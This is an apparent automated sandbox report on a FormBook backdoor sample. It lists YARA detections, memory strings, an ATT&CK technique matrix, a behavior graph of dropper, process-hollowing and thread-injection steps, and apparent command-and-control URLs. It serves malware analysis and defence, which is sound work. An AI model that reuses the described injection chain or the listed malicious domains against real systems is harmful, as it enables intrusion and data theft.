              Source: oxhvi.msc.exe, 00000016.00000002.1811275128.0000000000D3C000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1807175907.0000000000CC8000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1809809341.0000000000D3B000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1807328415.0000000000D38000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1938721846.0000000001979000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1937912252.0000000001908000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000002.1942689431.0000000001985000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1938031796.000000000190C000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1940675061.0000000001985000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1938394774.0000000001968000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: regshot.exe

              Stealing of Sensitive Information

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000012.00000002.2628887806.0000000002A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000003.1994918677.000000000169A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.1632670112.0000000001030000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000003.1778571483.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000003.1994440354.000000000169A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000003.1784873248.0000000000E34000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000025.00000002.2032446289.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000003.1781279846.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000003.1914895579.0000000001A12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000003.1993986799.00000000016C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000003.1779088648.0000000000DE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000003.1917625527.00000000019DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000003.1995504017.000000000169A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000003.1785265319.000000000378C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000003.1779323188.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000003.1785169179.0000000000D7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.1633266545.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000003.1913572826.00000000019E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000003.1995901696.0000000004154000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.1823176871.0000000000FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.1631433911.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.1631393564.0000000000FBD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000003.1994684726.000000000170D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.1632049860.000000000102C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000003.1916791732.00000000019B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000003.1785668153.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000003.1995504017.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000003.1778617142.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000013.00000002.1690629152.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000003.1784873248.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.1632049860.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.1824428727.0000000000950000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.1633788753.0000000000FBC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.1631481618.0000000001018000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000003.1996380159.000000000166A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.1632478090.0000000001030000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000003.1913693018.0000000001A3C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.1633303654.0000000003827000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000003.1995598062.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000003.1914595785.0000000001A11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.1632707847.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.1954404710.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000003.1993881319.000000000166B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000003.1779404808.0000000000E42000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000021.00000002.1954501729.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000003.1995831269.000000000163D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000003.1994589968.00000000016E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000003.1914843943.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000003.1778666606.0000000000E06000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000003.1785086182.0000000000E37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.1632126525.0000000001062000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000003.1917367387.00000000042CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.1666060455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000003.1993929850.0000000001699000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000003.1914324145.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.2628367776.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000003.1913627559.0000000001A0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.2628964763.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: oxhvi.mscBinary or memory string: WIN_81
              Source: oxhvi.mscBinary or memory string: WIN_XP
              Source: oxhvi.msc.exe, 0000001B.00000000.1843929624.0000000000353000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
              Source: oxhvi.mscBinary or memory string: WIN_XPe
              Source: oxhvi.mscBinary or memory string: WIN_VISTA
              Source: oxhvi.mscBinary or memory string: WIN_7
              Source: oxhvi.mscBinary or memory string: WIN_8

              Remote Access Functionality

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000012.00000002.2628887806.0000000002A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000003.1994918677.000000000169A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.1632670112.0000000001030000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000003.1778571483.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000003.1994440354.000000000169A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000003.1784873248.0000000000E34000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000025.00000002.2032446289.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000003.1781279846.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000003.1914895579.0000000001A12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000003.1993986799.00000000016C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000003.1779088648.0000000000DE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000003.1917625527.00000000019DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000003.1995504017.000000000169A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000003.1785265319.000000000378C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000003.1779323188.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000003.1785169179.0000000000D7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.1633266545.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000003.1913572826.00000000019E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000003.1995901696.0000000004154000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.1823176871.0000000000FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.1631433911.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.1631393564.0000000000FBD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000003.1994684726.000000000170D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.1632049860.000000000102C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000003.1916791732.00000000019B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000003.1785668153.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000003.1995504017.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000003.1778617142.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000013.00000002.1690629152.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000003.1784873248.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.1632049860.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.1824428727.0000000000950000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.1633788753.0000000000FBC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.1631481618.0000000001018000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000003.1996380159.000000000166A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.1632478090.0000000001030000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000003.1913693018.0000000001A3C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.1633303654.0000000003827000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000003.1995598062.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000003.1914595785.0000000001A11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.1632707847.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.1954404710.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000003.1993881319.000000000166B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000003.1779404808.0000000000E42000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000021.00000002.1954501729.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000003.1995831269.000000000163D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000003.1994589968.00000000016E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000003.1914843943.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000003.1778666606.0000000000E06000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000003.1785086182.0000000000E37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.1632126525.0000000001062000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000003.1917367387.00000000042CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.1666060455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000003.1993929850.0000000001699000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000003.1914324145.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.2628367776.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000003.1913627559.0000000001A0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.2628964763.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_005B2163 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,8_2_005B2163
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_005B1B61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,8_2_005B1B61

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information1
              Scripting              		2
              Valid Accounts              		1
              Native API              		1
              Scripting              		1
              Exploitation for Privilege Escalation              		11
              Disable or Modify Tools              		1
              Credential API Hooking              		2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		1
              Ingress Tool Transfer              		Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts1
              Shared Modules              		1
              DLL Side-Loading              		1
              Abuse Elevation Control Mechanism              		1
              Deobfuscate/Decode Files or Information              		21
              Input Capture              		1
              Account Discovery              		Remote Desktop Protocol1
              Credential API Hooking              		1
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts2
              Command and Scripting Interpreter              		2
              Valid Accounts              		1
              DLL Side-Loading              		1
              Abuse Elevation Control Mechanism              		Security Account Manager2
              File and Directory Discovery              		SMB/Windows Admin Shares21
              Input Capture              		1
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCron1
              Registry Run Keys / Startup Folder              		2
              Valid Accounts              		3
              Obfuscated Files or Information              		NTDS227
              System Information Discovery              		Distributed Component Object Model3
              Clipboard Data              		11
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
              Access Token Manipulation              		1
              Software Packing              		LSA Secrets361
              Security Software Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts712
              Process Injection              		1
              DLL Side-Loading              		Cached Domain Credentials2
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
              Registry Run Keys / Startup Folder              		1
              Rootkit              		DCSync3
              Process Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              Masquerading              		Proc Filesystem11
              Application Window Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
              Valid Accounts              		/etc/passwd and /etc/shadow1
              System Owner/User Discovery              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron2
              Virtualization/Sandbox Evasion              		Network Sniffing1
              System Network Configuration Discovery              		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd21
              Access Token Manipulation              		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
              Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task712
              Process Injection              		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
              Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
              Rundll32              		GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1549399 Sample: M1Y6kc9FpE.exe Startdate: 05/11/2024 Architecture: WINDOWS Score: 100 93 www.reon-network.xyz 2->93 95 www.lladinco.online 2->95 97 4 other IPs or domains 2->97 101 Found malware configuration 2->101 103 Malicious sample detected (through community Yara rule) 2->103 105 Multi AV Scanner detection for submitted file 2->105 109 13 other signatures 2->109 14 M1Y6kc9FpE.exe 3 34 2->14         started        signatures3 107 Performs DNS queries to domains with low reputation 93->107 process4 file5 87 C:\Users\user\AppData\Local\...\oxhvi.msc, PE32 14->87 dropped 89 C:\Users\user\AppData\Local\Temp\...\wnrs.vbe, Unicode 14->89 dropped 91 C:\Users\user\AppData\...\bvqmcwxut.docx, Unicode 14->91 dropped 159 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 14->159 18 wscript.exe 1 14->18         started        signatures6 process7 signatures8 99 Windows Scripting host queries suspicious COM object (likely to drop second stage) 18->99 21 cmd.exe 1 18->21         started        23 cmd.exe 1 18->23         started        26 cmd.exe 1 18->26         started        process9 signatures10 28 oxhvi.msc 1 32 21->28         started        32 conhost.exe 21->32         started        125 Uses ipconfig to lookup or modify the Windows network settings 23->125 34 ipconfig.exe 1 23->34         started        36 conhost.exe 23->36         started        38 conhost.exe 26->38         started        40 ipconfig.exe 1 26->40         started        process11 file12 79 C:\Users\user\AppData\Local\...\oxhvi.msc.exe, PE32 28->79 dropped 81 C:\Users\user\AppData\Local\...\oxhvi.msc, PE32 28->81 dropped 83 C:\Users\user\AppData\Local\...\oxhvi.msc.exe, PE32 28->83 dropped 85 2 other files (1 malicious) 28->85 dropped 147 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 28->147 149 Writes to foreign memory regions 28->149 151 Allocates memory in foreign processes 28->151 153 Injects a PE file into a foreign processes 28->153 42 RegSvcs.exe 28->42         started        45 RegSvcs.exe 28->45         started        155 Tries to detect virtualization through RDTSC time measurements 34->155 157 Switches to a custom stack to bypass stack traces 34->157 signatures13 process14 signatures15 127 Modifies the context of a thread in another process (thread injection) 42->127 129 Maps a DLL or memory area into another process 42->129 131 Sample uses process hollowing technique 42->131 47 explorer.exe 36 2 42->47 injected 133 Tries to detect virtualization through RDTSC time measurements 45->133 135 Queues an APC in another process (thread injection) 45->135 137 Found direct / indirect Syscall (likely to bypass EDR) 45->137 process16 signatures17 161 Uses netsh to modify the Windows network and firewall settings 47->161 50 oxhvi.msc.exe 47->50         started        54 oxhvi.msc.exe 47->54         started        56 oxhvi.msc.exe 47->56         started        58 8 other processes 47->58 process18 file19 77 C:\Users\user\AppData\...\oxhvi.msc.exe.exe, PE32 50->77 dropped 111 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 50->111 113 Writes to foreign memory regions 50->113 115 Allocates memory in foreign processes 50->115 60 RegSvcs.exe 50->60         started        63 RegSvcs.exe 50->63         started        117 Injects a PE file into a foreign processes 54->117 65 RegSvcs.exe 54->65         started        67 RegSvcs.exe 54->67         started        69 RegSvcs.exe 56->69         started        71 RegSvcs.exe 56->71         started        119 Modifies the context of a thread in another process (thread injection) 58->119 121 Maps a DLL or memory area into another process 58->121 123 Tries to detect virtualization through RDTSC time measurements 58->123 73 cmd.exe 1 58->73         started        signatures20 process21 signatures22 139 Modifies the context of a thread in another process (thread injection) 60->139 141 Maps a DLL or memory area into another process 60->141 143 Sample uses process hollowing technique 60->143 145 Found direct / indirect Syscall (likely to bypass EDR) 63->145 75 conhost.exe 73->75         started        process23

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              M1Y6kc9FpE.exe79%ReversingLabsWin32.Backdoor.FormBook

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc.exe0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\RegSvcs.exe0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe.exe0%ReversingLabs

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://www.infeng01.xyzReferer:0%Avira URL Cloudsafe
              http://www.inlinlong.top0%Avira URL Cloudsafe
              http://www.01595.xyz/o52o/0%Avira URL Cloudsafe
              http://www.reon-network.xyz/o52o/0%Avira URL Cloudsafe
              http://www.indseniorjob881.click/o52o/www.anion.app0%Avira URL Cloudsafe
              http://www.jg-bw.app/o52o/0%Avira URL Cloudsafe
              http://www.anion.app0%Avira URL Cloudsafe
              http://www.1r1f9bnfo4s4.top/o52o/www.heiritforum.buzz0%Avira URL Cloudsafe
              http://www.inecraftpuro.net0%Avira URL Cloudsafe
              http://www.arehouse-inventory-62571.bond/o52o/0%Avira URL Cloudsafe
              http://www.lladinco.online/o52o/www.inlinlong.top0%Avira URL Cloudsafe
              http://www.arehouse-inventory-62571.bond0%Avira URL Cloudsafe
              http://www.anion.appReferer:0%Avira URL Cloudsafe
              http://www.jg-bw.appReferer:0%Avira URL Cloudsafe
              http://www.eusvexk.shop0%Avira URL Cloudsafe
              http://www.1r1f9bnfo4s4.top/o52o/0%Avira URL Cloudsafe
              http://www.ybokiesite.onlineReferer:0%Avira URL Cloudsafe
              http://www.heiritforum.buzz0%Avira URL Cloudsafe
              http://www.heheartofthehome.net0%Avira URL Cloudsafe
              http://www.jg-bw.app/o52o/www.eusvexk.shop0%Avira URL Cloudsafe
              http://www.heheartofthehome.net/o52o/0%Avira URL Cloudsafe
              http://www.eusvexk.shop/o52o/0%Avira URL Cloudsafe
              http://www.mewtcp.xyz/o52o/0%Avira URL Cloudsafe
              http://www.indseniorjob881.click0%Avira URL Cloudsafe
              http://www.arehouse-inventory-62571.bondReferer:0%Avira URL Cloudsafe
